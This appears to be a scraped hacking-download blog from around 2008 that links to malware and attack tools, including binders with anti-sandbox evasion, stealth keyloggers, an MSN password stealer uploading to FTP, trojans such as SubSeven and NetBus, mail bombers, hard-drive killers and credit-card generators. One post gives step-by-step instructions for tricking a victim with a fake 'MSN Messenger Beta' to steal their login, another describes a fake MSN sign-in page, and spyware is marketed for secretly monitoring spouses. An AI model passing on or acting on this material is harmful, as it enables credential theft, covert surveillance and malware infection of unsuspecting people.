SOLiD Binder

Posted by Bijay | 2:26 AM | , | 0 comments »




Features
Extraction Options
Execution Options
Registry Startup
XOR Encryption
RC4 Encryption
Fake Message Box #Can be used without binder
Remote WebDownloader #Can be used without binder
Icon Changer
UPX Support


Size :- 682.1 kb

Free Download
Image and video hosting by TinyPic

SOLiD Binder

Password:SOL


Read more on this article...

1- Supports one executable file
2- Icon change support
3- Tested on xp/vista
4- Stub ~13kb Uncompressed
5- PE Validation
6- Anti norman sandbox

Free Download
Image and video hosting by TinyPic

Spider Packer
Read more on this article...

SpyBoss Pro leading keylogger computer & Internet monitoring software tool SpyBoss Pro records every detail of what is done on a computer – records chats, instant messages, emails, web sites visited, what is searched for, what is done on MySpace.com, pictures posted and looked at, keystrokes typed, the programs run and much much more... Spy Boss also uses advanced surveillance screen snapshot features, you get to see not only what they do, but the exact order in which they do it, step by step. With SpyBoss Pro, you will never doubt who is doing what on the computer.

Key features and benefits:
• Secretly Monitor: Keystrokes, Screenshots, Email, Instant Messenging, Chatting, Websites Visited, Passwords & Usernames, Programs Run and much much more ...
• Password Protection: SpyBoss can be set to use a password to prevent access to the program.
• Stealth Mode: Run SpyBoss Pro invisible stealth-mode, prevent computer users from knowing it exists.
• Encrypted Data Files: Monitored data is collected in secure encrypted files, if anyone where to discover a log file they would not be able to read it.
• Email Log Files: Monitor your computer from anywhere. Secretly send encrypted log files to an email address at specified intervals.
• Record Usernames & Passwords: View usernames & password for websites, chat programs, online email etc ...

Read more on this article...

Hackers Black CD - Download

Posted by Bijay | 10:59 PM | | 0 comments »

28:41 Series Intro
29:16 Hacker Terms
35:54 Hacker Procedures
26:42 Using VMWare
49:17 Using Linux
27:44 Passive Intelligence Gathering Part 1
31:43 Passive Intelligence Gathering Part 2
33:24 Social Engineering
33:33 Network Reconnaissance Part 1
30:25 Network Reconnaissance Part 2
33:03 Service Identification and Enumeration
35:35 Vulnerability Assessment: Nessus & GFI Languard
26:35 Vulnerability Assessment: Network Sniffing
34:55 SNMP
33:01 DNS
44:13 Password Cracking
36:58 Exploits Part 1: Linux
34:09 Exploits Part 2: Windows
24:36 Web and File Exploits
37:56 Wireless Security
20:33 Erasing Tracks

Free Download
Image and video hosting by TinyPic

http://rapidshare.com/files/102108980/Hacker_Black_CD.part01.rar
http://rapidshare.com/files/102112293/Hacker_Black_CD.part02.rar
http://rapidshare.com/files/102115645/Hacker_Black_CD.part03.rar
http://rapidshare.com/files/102395271/Hacker_Black_CD.part04.rar
http://rapidshare.com/files/102398225/Hacker_Black_CD.part05.rar
http://rapidshare.com/files/103178815/Hacker_Black_CD.part06.rar
http://rapidshare.com/files/102391957/Hacker_Black_CD.part07.rar
http://rapidshare.com/files/102107461/Hacker_Black_CD.part08.rar

Read more on this article...

ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2

after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection. Read more on this article...

1-John the Ripper Win32

http://passcrack.spb.ru/modules/Files/Public/john-17w.zip

2-RainbowCrack tools

http://passcrack.spb.ru/modules/Files/Public/raincrck.rar

3-MD5Crack

http://passcrack.spb.ru/modules/Files/Public/MD5Crack.exe

4-PasswordsPro
MD4, MD5, SHA-1 and MySQL hashes. Generates 10 types of hashes: MySQL, MD4, MD4 (Base64), MD5, MD5 (Base64), MD5 (Unix), MD5 (APR), MD5 (RAdmin 2.x), SHA-1 and SHA-1 (Base64).

http://www.insidepro.com/download/saminside.zip

5-MD5Inside

http://passcrack.spb.ru/modules/Files/Public/md5inside.zip

6-Md5 Tool Box

http://members.lycos.co.uk/b5ot5/md5/md5toolbox10.rar

7-john the riper

http://www.zshare.net/download/158815851581-157615851606157516051580-157516041580160816071606-zip.html

8-rainbowcrack-1.2-win

http://www.zshare.net/download/158815851581-157615851606157516051580-1575160415801583157516081604-zip.html

9-cain

http://www.zshare.net/download/158815851581-157615851606157516051580-cain-zip.html

10-MDCrack 1.8.3

http://c3rb3r.openwall.net/mdcrack/download/MDCrack-183.zip

11-MDcrackEasyLoader

http://c3rb3r.openwall.net/mdcrack/download/MDcrack%20EasyLoader.zip


12-Passw0rd Craking All in One 2oo7

Brutus AET2 Password Crack
-Cain & Abel 4.2
-Hydra 5.3 [Brute Force Pass Cracker]
-John The Ripper 1.71 Win
-MD5 Cracker
-MD5 Password Cracker
-Medusa Password Cracking 1.1 per Linux
-OphCrack 2.3.3

http://rapidshare.com/files/16902278/Pk-o7.rar

pass : d4rk-r3v-t34m

Now Site For Crack MD5

MD5 Reverse Lookup
http://md5lookup.com/

------------------------------------


xMD5
http://www.xmd5.org/index_en.htm

------------------------------------

Stephen D Cope
http://nz.md5.crysm.net/

------------------------------------

Gdata
http://gdataonline.com/seekhash.php

------------------------------------

md5(); (puRe)
http://md5.rednoize.com/

------------------------------------

Ice Breaker
http://ice.breaker.free.fr/

------------------------------------

milw0rm
http://www.milw0rm.com/md5/insert.php

------------------------------------

shm
http://shm.hard-core.pl/md5/

------------------------------------

hash Checker
http://www.hashchecker.com/?_sls=add_hash

------------------------------------

OPHCRACK
http://lasecwww.epfl.ch/%7Eoechslin/...ts/ophcr ack/

------------------------------------

Ben Ramsey
http://md5.benramsey.com/

------------------------------------

altervista
http://md5.altervista.org/

------------------------------------

xpzone
http://md5.xpzone.de/

------------------------------------

SecurityStats
http://www.securitystats.com/tools/hashcrack.php


------------------------------------

Cmd5

WwW.Cmd5.Com

------------------------------------
Read more on this article...



Free Download
Image and video hosting by TinyPic

Habbo Broote Forcer

Read more on this article...

Hacking Tools

Posted by Bijay | 6:07 AM | | 0 comments »

Includes:

ZER0CoOLs Mail BomBER.php
ConnectBack Backdoor Shell vs 1.0 by LorDdc.pl
Mass Defacer And Log EraserMass Defacer And Log Eraser.pl
Multi-thread FTP scanner v0.2.5 by Inodefb.tar
Flud2Mail (F2M) 0.1.txt
FTp brute forcer.php
iMHaBiRLiGi PhpFtp V1.1.php
inDEXER And ReaDer.asp
LocalLinuxExploitFinder.txt
MD5Bot.pl
NetGaurd FTP Brute Force.php
PHProxy.php
RST MySQL tools.php
S l a v e Z e r o IRC B0t.php
scan - K. Script v0.3 Beta By DiVaBoY.php
Simple FTP brute by ReZEN.php
Stealth ShellBot Vers?o 0.2 by Thiago X.txt
ConnectBack Backdoor Shell vs 1.0 by LorD
Mass Defacer And Log Eraser
Multi-thread FTP scanner v0.2.5 by Inode

Free Download
Image and video hosting by TinyPic

Hacking Tools

Read more on this article...



Google Hacks is a compact utility that will allow its users to search google using
different google search hacks. Using Google Hacks one can easily do a music search
by using a highly optimized and complex search command that can be obtained just by
clicking a number of option boxes that can be found in the program´s interface.

OS: Win 98/ME/2000/XP/2003

Free Download
Image and video hosting by TinyPic

Google Hacks Version v1.6


Read more on this article...

Cult of the Dead Cow (www.cultdeadcow.com) released a tool called Goolag Scanner which automates scanning certain web sites for Google hacks. Use it on your own risk!

While using this tool in Germany is not prohibited by law (Hackerparagraph 202c) if you don’t do this intentionally to commit crime, it is indeed not legal in the UK.
Besides that Google may block your IP if you use that tool extensively. So please be cautious when using Goolag Scanner!
find links at
http://www.goolag.org/ Refer to laws
http://www.gesetze-im-internet.de/stgb/__202c.html for germany


http://www.heise-online.co.uk/news/Cult-of-the-Dead-Cow-turns-Google-into-a-vulnerability-scanner--/110087 Read more on this article...




Info:
-----------------------------------

Gets Stored MSN 3.5 - 8.5 (Live) and Windows Messenger Passwords,
Writes to Text File,
Uploads to FTP Server of your choice!

-----------------------------------
Scanned on 17-04-2008:
-----------------------------------
Antivir: Nothing found
ArcaVir: Nothing found
Avast: Nothing found
AVG: Nothing found
BitDefender: Nothing found
F-Prot: Nothing found
Norman: Nothing found
Rising: Nothing found
VirusBlokAda32: Nothing found
VirusBuster: Nothing found



http://www.viruschief.com/report.html?report_id=663603171d6224c240491eb2961f2acebf87887c

Scanned by
http://www.viruschief.com
Read more on this article...

MSN Hacks - Tool

Posted by Bijay | 9:21 PM | , | 0 comments »

Evil Msn is an advanced msn messenger tool with many different features to make your experience with msn better.

************************************************** *
Feature List:

Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools
************************************************** *

Compatibilty:
Designed for Windows XP SP1
Msn Messenger 6+
************************************************** *

Free Download
Image and video hosting by TinyPic

Now you can see what's hidden
http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Required Files
http://www.completelyfreesoftware.com/vb_runtime_files.htm//div>

Code:
http://download.microsoft.com/download/vb6.../vbrun60sp5.e/
And new add








This is plain and simple to use this Program
1st in the Program is several links for you to give your oponant after they receave the url they will goto it and it will look like
a sighn in page for msn they sighn in using there passport id and there
password then look in this Program and it will show u there password and ip
u first must register at a website to get ya login details this is simle as pie ..

and a rapidshare premium downloader, i have tested that and it worked
fine for me




Code:

http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Read more on this article...

MSN Hack T00LS

Posted by Bijay | 6:47 AM | , | 0 comments »

File: Msn Auto Responder.rar
DownloadLink: http://rapidshare.com/files/75269540/Msn_Auto_Responder.rar

--------------------------------------------------------------------------
File: Msn Detector 2.0.rar
DownloadLink: http://rapidshare.com/files/75270255/Msn_Detector_2.0.rar

--------------------------------------------------------------------------
File: MSN Bomberman v3.1.2.rar
DownloadLink: http://rapidshare.com/files/75270317/MSN_Bomberman_v3.1.2.rar

--------------------------------------------------------------------------
File: MSN.Sniffer.1.2.+.Crack.rar
DownloadLink: http://rapidshare.com/files/75270787/MSN.Sniffer.1.2._.Crack.rar

--------------------------------------------------------------------------
File: Locker.rar
DownloadLink: http://rapidshare.com/files/75271252/Locker.rar

---------------------------------------------------------------------------
File: MSN Flooder.rar
DownloadLink: http://rapidshare.com/files/75271337/MSN_Flooder.rar Read more on this article...

Read more on this article...



urple'>What it is: Msn tools. some msn tools to have fun with. With the iso comes loads of freezers booters flooders and other fun
tools!
if you ever wanted to have some fun with msn then you should
download this.
There is even a hard tools section with rats keyloggers ect.
this is for educational use only!
If you scan this there will be about 5 trojans found but these are
hacking tools! the antivirus will detect all hacking tools as
harmfull. I tested most of the programs and my computer still works
fine,still its your own risk.

Help: To get the .iso working you will either need to burn it on cd or mount it with deamon tools or PowerISO, Alcohol 120% or Winmount ect ect. Google will enlighten you on that xD


and download the program.

After installation mount the msnhack img with deamon tools and it should autorun after that.

Read more on this article...

Included:
Windows Live Messenger 8.1.0178
-aMSN 0.94 [Linux]
-Messenger Plus! Live 4.11.254
-Plugin / Script for Messenger Plus!
-Skin Windows Live Messenger
-A-Patch 1.3.0 RC1 (build 54)
-MessPatch 8.1.0.178 - Generation 5
-StuffPlug-NG Patch 3.0.286 BETA
-MSN BackUP 1.3.2 BETA
-MSN BackUP 1.1.7 [Only MSN 7 & 7.5]
-Live Messenger Now Playing Plugin
-Toaster for Winamp 0.7.8
-1000+ Emoticons [Smile Classic ,Objects & Symbols ,Super Smile ,Personal Emoticons]
-1000 Avatars
-Clean Messenger 2.7.0168
-aMSN v0.95/PortableaMSN v1.0.0.5 Multilingual r03
-Same usefull Sites about MSN


Free Download
Image and video hosting by TinyPic

Msn AIO Pack 2007

Read more on this article...

mssql-hax0r v0.9 is a Multi-purpose MS-SQL injection attack tool for advanced Microsoft SQL Server exploitation. Three modes of operation are currently available: info (Information Gathering), dump (Record Dump), and brute (Brute Force).

You may need to tweak the code a bit to make it fit your needs (i.e. modifying the injection string and/or the language used by the RDBMS).


TODO (v1.0):

* fix italian language support (test platform needed)
* info mode: add logins target (master..sysxlogins) [name,dbname,password]
* brute mode: automatic login grabbing feature?
* info mode: add sys target (xtype=’S')?
* info mode: implement better types/keys dumping
* add a command execution mode via master..xp_cmdshell?
* add a privileged testing mode for post-auth vulnerabilities


It’s a fairly early version, I’ve been watching it since v0.1 - it’s a little more polished now but it’s still definitely a tool for more advanced users.

I’m sure some of you will find it useful.


Free Download
Image and video hosting by TinyPic

mssql-hax0r v0.9 - Multi-purpose MS-SQL Read more on this article...




Free Download
Image and video hosting by TinyPic

mIRC spammer


Read more on this article...

Hacking Tool Kit

Posted by Bijay | 12:59 AM | | 0 comments »

Hacking Tool
#### Clients ####
back orifice source
BackDoor v2.0
DeepThroat v3.1
Doraah War Engine v1.0b
Hack 'a' Tack v1.20
Http Bomber v1.001b
Kuang2 Client v0.21
NetBus v1.20
NetBus v1.70
NetBus v2.0b Pro
SchoolBus v1.85
Shadow Remote Administator & Control v1.04
Shadow Security Scanner v5.07
Shadow Security Scanner v5.21
SubSeven v2.1 Gold Edition
SubSeven v2.1
Vampire v1.2
WebCracker v4.0
WinCrash v2.0
wwwhack v1.913
------------------

#### Security ####
Anti-Keylogger v2.1
Anti-Trojan v5.5
Local Port Scanner v1.2.2
NeoTrace Pro v3.20
NeoWatch v2.4
PestPatrol v3.2
ProPort v2.0
Trojan remover v3.3.7
Trojans First Aid Kit v5.0
------------------

#### Serial Software ####
Angus v3.0
Dragon v2.0
KeyGen Killer v1.1
NEO 2.0b
Octavius v2.1
Oscar 2000
Ripper v1.00
Serial-0-Matic v2.4
Serials 2000 Template file - Little Red Wagon
Serials 2000 v7.1 Crew 2001-9-16
Serials 2000 v7.2 BytE RippeR 2003-12-15
Tesla v1.4
------------------

#### Chat ####
Blue Fire v2.5
------------------

#### Mail Bomb ####
Anonymous Mail Bomber
Divine Intervention
Euthanasia v1.52
fmbomb
Homicide
KaBoom v3.0
Mail Bomber v8.1
Mail Fraud
mailbombv02b
MiSoSKiaN's Fake Mail
Nemisis Mail Bomber v1.0
Poperganda v2.0
Quick Fyre
Saddamme v0.2
SMS Bomber v1.3
Unabomber
------------------

#### Ping & Nukes ####
Battle Pong v1.0
BitchSlap v1.0
Click v1.4
Evil FTP Hacker
Evil Ping v0.3b
F-ed Up v2.0
Gimp
IgmpNuke v1.0
kod
LORNuke v2.0
Meliksah Nuke v2.5
Muerte v2.1
Nuke v2.3
Nuke'em v1.0
VZMNuker
WinNuke v95
------------------

#### Keyboard Key Logger ####
KeyLog98
KeyTrap v1.0
------------------

#### Java ####
appletkiller
attackthread
consume
hostile
nasirc
scapegoat
silentthreat
ungrateful
wasteful
------------------

#### Port & IP Scaner ####
Angry IP Scanner v2.08
a*s Sniffer v1.0.1
Blues Port Scanner v5
IP Stealer Utilities
ITrace32 v2.00
Porter v1.2
SuperScan v2.06
------------------

#### Credit Card Generator ####
CCard Number Generator
Credit Card Generator v1.0b
------------------

#### Crash Hard Drive ####
Crash Pentium 2
Hard Drive Killer Pro v4.0
Hard Drive Killer Pro v5.0b
------------------

#### Password Recovery Tool ####
Cain v1.51Download :-

Free Download
Image and video hosting by TinyPic

Hacking Tool Kit


Read more on this article...

Dictionary tool:

MagicFilter
Code:

http://www.freewebs.com/t800t/MagicFilter.rar

Raptor3 [ belt sinicizes patch ]
Code:

http://www.freewebs.com/t800t/Raptor3.zip


The SuperDic_V3.2 registration version [ easy superior super dictionary production tool, function to be good ]
Code:

http://www.freewebs.com/t800t/SuperDic_V32.zip


Pwdmaker_1.151
Code:

http://www.freewebs.com/t800t/pwdmaker_1.151.rar


Decodes the tool: John the Ripper
Code:

http://www.xisp.org/downloads/jtr.zip


AUthX
Code:

http://www.freewebs.com/t800t/AUthX.rar



Withdraws the password and processes the LOG files tool:

Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:

http://www.freewebs.com/t800t/Z_nakeR2.zip


ccbrip
Code:

http://www.xisp.org/downloads/ccbillrip.zip


ibillrip
Code:

http://www.xisp.org/downloads/ibillrip.zip



*Accessdiver (AD) by Jean Fages
Code:

http://www.accessdiver.com


*Sentry by Sentinel:
Code:

http://sentinel.deny.de/sentry.php


*Form@ (specifically for FORM sites) by SSS -
Code:

http://sss.deny.de/


Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:

http://sentinel.deny.de/Caecus.php


Ares by Gamoaa -
Code:

http://www.xisp.org/downloads/FACE_Setup.zip


Brutus
Code:

http://www.hoobie.net/brutus/


AuthForce by Zachary P. Landau
Code:

http://kapheine.hypa.net/authforce/index.html


Entry by Sparkleware
Code:

http://www.sparkleware.com/entry/index.html


Xavior By LithiumSoft
Code:

http://www.btinternet.com/~lithiumsoft/Products.html


Web Password Checker (WPC) .1 For UNIX by g1soft
available @
Code:

http://www.securityfocus.com/tools/885/scoreit


Munga Bunga's http Brute Forcer by Munga Bunga
Code:

http://www.hackology.com


Wordlist Tools:

*Raptor 3 by Madmax -
Code:

http://madmax.deny.de/downloads/raptor.zip


Words Extractor
Code:

http://www.intellitamper.com/wordsextractor/


Lucifer by Rhino -
Code:

http://rhino.deny.de/lucifer.php


ALS_novice by Wolfman -
Code:

http://wolfman.deny.de/tools.html


Z-leecher by Beda
Code:

http://goldmaster.webpark.cz/sleech.html


S-Generator by Beda
Code:

http://goldmaster.webpark.cz/sgen.html


S-WordlistTool by Beda
Code:

http://goldmaster.webpark.cz/swordt.html


Proxy Tools:

*Proxyrama By Gaamoa -
Code:

http://gaamoa.deny.de/


*Charon by Rhino -
Code:

http://www.icefortress.com/hosts/rhino/


*Advanced Proxy Leecher (APL) by Sentinel-
Code:

http://sentinel.deny.de/apl.htm


Geowhere by Jean Fages (NOT-Freeware) -
Code:

http://www.geowhere.net/


Proxy List Filter -
Code:

http://www.freeproxy.ru/en/programs/proxy_filter.htm


AATools by Glocksoft
Code:

http://www.glocksoft.com/aatools.htm


Proxy Bag
Code:

http://www.intellitamper.com/proxybag/


S-Proxy Tool by Beda
Code:

http://goldmaster.webpark.cz/sproxy.html


Exploiting Tools:

*Triton (Scanner) by Rhino -
Code:

http://rhino.deny.de/triton/index.php


*CMX IV by Xtremnet -
Code:

http://xtremet.deny.de/products.htm


CCBill Local Cgi Exploiter By Ksoze-
Code:

http://ksoze.deny.de/ccbill_exp.html


IBT2 by wolfman:
Code:

http://wolfman.deny.de/tools.html


Hephaestus's Ashen Spear by Wolfman:
Code:

http://wolfman.deny.de/HAS.php


Intellitamper
Code:

http://www.intellitamper.com/infos.php


Putty
Code:

http://www.chiark.greenend.org.uk/~sgtatham/putty/


Decrypting Tools:

*John The Ripper (JTR) -
Code:

http://www.openwall.com/john/


MDcrack (MD5 Cracker) -
Code:

http://membres.lycos.fr/mdcrack/


Distributed John The Ripper by Luis Parravicini
Code:

http://ktulu.com.ar/en/djohn.php


Cain and Abel by Massimiliano Montoro
Code:

http://www.oxid.it/cain.html


Salt Grinder by Wolfman
Code:

http://wolfman.deny.de/SaltGrinder.php


Log Tools:

LogRip by Rhino -
Code:

http://rhino.deny.de/logrip.php


Azarius by Rhino -
Code:

http://rhino.deny.de/azarius.php


Zimapass Parser by Sentinel:
Code:

http://sentinel.deny.de/zimaparser.htm


*C-Parse (ccbill.log parser) by Sentinel:
Code:

http://sentinel.deny.de/c_parse.htm


CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:

http://membres.lycos.fr/ccbill/


Accessdiver/Ares Parser by Sentinel:
Code:

http://sentinel.deny.de/ad_ares_parser.htm




Spoofers:

Zspoof by wolfman -
Code:

http://wolfman.deny.de/tools.html


Sploof by Jean Fages -
Code:

http://www.accessdiver.com/sploof.htm


Final Spoof
Code:

http://www.beatharness.com/finalspoof/


Spooph by nast0
Code:

http://24.106.100.133/spooph/index.html


D-Spoof And Others (Russian Site, English Prog)
Code:

http://mspoofer.pisem.net/zaza/index.htm


Mikho's Online Spoofer (web based spoofer)
Code:

http://mikho.kicks-ass.net/spoofs/spoofs.hta


QuickSpoof
Code:

http://httpd.chello.nl/~m-koster2/spoofs.htm


Other Tools:

Code:

Scholar by Sentinel - (History checker)
http://sentinel.deny.de/scholar.htm


Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:

http://xtremet.deny.de/products.htm


Read more on this article...

Skyecaller Pro 1.0

Posted by Bijay | 1:44 AM | | 0 comments »



Caller Skye Pro has some cool features such as Full screen caller image display, Video Ringtone, Ringtone manager. You can set video ringtones for your contacts.

How to crack:
To Install softwares on Your Series 60v3 Phones like Nokia N95,N81,N96,N92,N80 & more... you will need to PATCH up
your Mobile phone Once only. You only have to patch your phone One Time (Unless you don't upgrade firmware or reset phone)
And Once your phone is patched using "Binpda's SecMan" you can install almost any software on Your Series 60v3
device.

SkyeCaller PRO adds value to the user's daily mobile experience by contributing a highly compelling, easy-to-use, interactive and dynamic visual element to all voice and text communications by allowing the user to personalise their device using caller image display, video ringtone playback and manage audio ringtones all from one convenient and very smart looking application.

SkyeCaller PRO allows handset device personalisation through use of the following key features:

1. Full Screen Caller Image Display
2. Video Ringtone Player
3. Ringtone Manager

Full Screen Caller Image Display

SkyeCaller PRO allows the user to pair an image on a mobile device with a Contact in the phonebook. On receipt of a voice call or text message, the caller image and contact details are displayed on-device in full screen.

The same method applies to all outgoing calls and text messages allowing the user to determine who a call or text message is being sent to using the SkyeCaller PRO image display interface. This is a useful confirmation technique to help avoid communication to unintended recipients.
Full Screen Video Ringtone Player

SkyeCaller PRO also allows the user to pair videos on their mobile device with a Contact or a device Profile. On receipt of a voice call, the user is notified of the caller with a full screen video ringtone playing. The user is able to make use of ANY video as long as the format of the video is device compliant, it will function as a compatible video ringtone.

Ringtone Manager

The SkyeCaller PRO application also serves as a convenient interface to manage regular audio ringtones. Using the 'Sound clips' interface, the user can set sound files on-device to any Contact or device Profile.
Requirements:

· Symbian S60 3rd Edition

Free Download
Image and video hosting by TinyPic

Skyecaller Pro 1.0
Read more on this article...

Hack your Symbian 9.1

Posted by Bijay | 1:40 AM | | 0 comments »

Hack your Symbian 9.1 (N73+other S60 3rd)

Warning : Please Install on only supported devices. Identify your Device type and select device type (pre-FP1 or FP1) during installation

Nokia Symbian OS 9.1 or S60 3rd Edition is much secured and you can not install any 3rd party unsigned application. But with this Simple hacking tool you can be free from this bothering. Hack your S60 3rd and Install any unsigned application. Its easy and there is an instruction file. Just read the "how to install.txt" and its easy like abc.


Change phone date to 15-05-2007

This program will install:
CapsOn
CapsOff
HelloCarbide
X-plore

*Note: If you have any of these programs installed on your mobile there is no problem continuing the installation, however, this ones have been tested, none others, so if you have any trouble during the procedure uninstall the ones you have and re-install "Hack FP1 & PreFP1.SiS"

After installing please follow this procedure:
1.-Run X-plore and press "0", tick the 4 boxes (dont un-tick if ticked already)
2.-Without closing X-plore switch to the menu and run hellocarbide
3.-Inside hellocarbide press options and chose Menu1 and answer "yes".
4.-Go back to X-plore and extract installserver.exe and CProfDriver_SISX.ldd from your c:\hack.rar into c:\sys\bin
5.-Restart your phone.
6.-Install whatever you want on your phone, even if it is unsigned

Run capsOff if you wish to see private folders using X-plore and capsOn to hide them again
Note: I advice you to always hide private folders after you have completed whatever you wanted to do inside them...

Devices list:
Pre-FP1 devices:
-------------------
Nokia N77
Nokia E61i
Nokia E65
Nokia N93i
Nokia N91 8GB
Nokia E62
Nokia E50
Nokia 5500
Nokia N93
Nokia N73
Nokia N80
Nokia N71
Nokia N92
Nokia E70
Nokia E60
Nokia E61
Nokia 3250

FP1 devices:
---------------
Nokia 6124 classic
Nokia N82
Nokia N95-3 NAM
Nokia E51
Nokia N95 8GB
Nokia N81
Nokia N81 8GB
Nokia 6121 classic
Nokia 6120 classic
Nokia 5700 XpressMusic
Nokia 6110 Navigator
Nokia E90 Communicator
Nokia N76
Nokia 6290
Nokia N95

Free Download
Image and video hosting by TinyPic

Hack your Symbian 9.1




Read more on this article...



Harlan Carvey
A considerable amount of forensic analysis of Windows systems today continues to center around file system analysis; locating files in the active file system, or carving complete or partial files from unallocated space within the disk image. However, a great deal of extremely valuable information is missed if the Windows Registry is not thoroughly examined, as well.
»Client-side Exploits

Anushree Reddy
Client-side exploit are some of the most commonly seen exploits and this is mainly due to the fact that traditional perimeter security (firewalls, router access lists) offer little or no protection against these kinds of exploits. This is due to the fact that clientside exploits target vulnerabilities on the client applications.

»Simple WiFi Hacking with Eee Pc

Marco Lisci
In this article we'll see a simple and efficient method to retrieve a WEP key from a wireless network. The interesting part is that we'll obtain this key using an Eee Pc, the low cost netbook by Asus. After this article you will see that an Eee Pc with BackTrack is a must-have tool for any security specialist.

»SQL Injection in Action

Antonio Fanelli
Basic SQL Injection attacks have not gone away despite web 2.0 programming. In this article we will learn how to maintain earlier websites in order to protect against them.

»Auditing Oracle in a Production Environment

Aditya K Sood Aditya K Sood
This paper is based on real penetration testing of Oracle servers on HP-UX systems and the way the auditor has to follow to combat the stringencies that come in a way. We will dissect the errors and the way to bypass them to conduct the tests.

»PKCS Potion Number Twelve

Israel Torres
More today than ever enterprise cryptographic systems are being used by both private and government entities to fortify themselves against foreign and domestic attacks. This fortification consists of the applied practice of a policy known as Public Key Infrastructure (PKI).

»Virtualization and Security

Rishi Narang
In this world of enormous computing but limited energy, virtualization has now entered into the present day data centers, enterprises and user desktops to deliver efficient Green IT environments.

»Javascript Obfuscation Part 1

David Maciejak
It is common that attackers target victims web client or third party tools like Adobe Flash or Acrobat Reader. Web clients are targeted to exploit either vulnerability in their code or exploit flaws in third party softwares that can be loaded through them like ActiveX technologies or script engine in Flash or PDF.

»Hacking Movie Fallacies and Home User Infections

Matthew Jonkman
Surely every one of us has annoyed our significant other during a supposed hacking movie with constant statements of disgust. We try not to sigh, or let a Give me a break! slip, but they do. It's unavoidable.
»Consumers test – Virtual machines – an integral part of your security toolkit

Russell Kuhl , hakin9 team
What is a Virtual Machine? These days, you cannot toss an unwanted 512MB DIMM anywhere in the average server room and not hit a virtual machine (or VM as they are commonly known). They are everywhere, in one form or another. There are two basic types of VM’s, Process VM’s create an operating environment within the OS that isolates the process in question from the rest of the operating system.

»Dr. Vladimir Golubev – expert in cybercrime field

hakin9 team
This interview takes up an international problem of cybercrime. Mr. Vladymir Golubev (founder of Computer Crime Research Center) shares with you his experience, gained during years of work as the Member of International Police Association. Here you won’t find unambiguous answers, but things which will provoke you to think over your attitude towards security.

Read more on this article...

Sniffer and record all MSN chats, AOL (AIM) chat, Yahoo chat, and ICQ chat on your Local network automatically and secretly! It's the one for ALL!

Do you worry about whether and what your employees chat on instant messengers during the office hours? Are you curious about what your spouse chats on instant messenger? Do you want to track your kid's MSN chat, Yahoo chat, AOL (AIM) chat, and ICQ chat? If so, Messenger Detect is your solution. Messenger Detect can sniffer and record all MSN chats, Yahoo chat, AOL (AIM) chat, and ICQ chat on your Local network. It works secretly without need to install any client software on the target computers. It's safe to use because accessing and setting are all protected by your password. The chat logs are saved as the same format as you see in the messengers and classified by datetime. You can search and edit them directly in the Messenger Detect, and export then to a RTF file. In addition, Messenger Detect provides you 15 color themes, and reading mode as well. Try Messenger Detect now, and you will be convinced!

Main feature:

• Monitor and record all MSN (Live) chat, AOL (AIM) chat, Yahoo chat, and ICQ chat on your local network automatically.
• Run as NT service, automatically starts when Windows starts.
• Support logging MSN contact's online status.
• No need to install any client software on the target computers.
• Work secretly undetected by the target computers.
• Easy-to-use interface makes detecting and recording simple.
• Recoding options - you can select which contact you want to record the chat from, and set if you want to log the online status.
• Accessing and setting are all password protected
• Record almost all contents of chats including Instant messages with color and font, emotion icons etc.
• Chats are automatically saved as the same format as you see in the Messengers.
• Search in the chat logs easily and efficiently.
• Edit log directly in Messenger detect.
• Set your favorite color. 15 color themes provided!
• Export the rich text messages to a RTF file easily.
• Use speech engine to read chat messages for you.
• Date time stamp is added on every recorded message.
• FREE download and FREE to try for 15 days!
• FREE lifetime update!
• FREE lifetime technical support via email in English!

Version 2.70 (03/17/2008):
1. Support recording MSN web messenger chat and Yahoo web messenger chat.
2. Support recording MSN to Yahoo/Yahoo to MSN chat.
3. Bug fix for "Some Yahoo chat receive from server are not recorded".
4. Bug fix for "Some font tag in ICQ chat are not parsed correctly".
5. The type of chat are branded in the log as MSN/Yahoo/AOL/ICQ.

Read more on this article...

Linux Live-CD

Posted by Bijay | 12:35 AM | , , | 0 comments »

FBI Forensic Field Kit : Wireless Hacking Live DVD
This is the ultimate bootable Disk for the agent, (or wannabe agent)

Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD

Download

http://rapidshare.com/files/2445420/Blue.part01.rar
http://rapidshare.com/files/2445422/Blue.part02.rar
http://rapidshare.com/files/2445428/Blue.part03.rar
http://rapidshare.com/files/2445433/Blue.part04.rar
http://rapidshare.com/files/2445423/Blue.part05.rar
http://rapidshare.com/files/2445424/Blue.part06.rar
http://rapidshare.com/files/2445425/Blue.part07.rar
http://rapidshare.com/files/2445429/Blue.part08.rar
http://rapidshare.com/files/2445432/Blue.part09.rar
http://rapidshare.com/files/2445431/Blue.part10.rar
http://rapidshare.com/files/2445435/Blue.part11.rar
http://rapidshare.com/files/2445421/Blue.part12.rar

(above one is checked by me and is working perfectly) Read more on this article...

The guys at BackTrack e-mailed me to let me know their Version 3 BETA has been released recently, and perhaps our readers would like to know about it.

For those that don’t know BackTrack evolved from the merging of two wide spread security related distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.


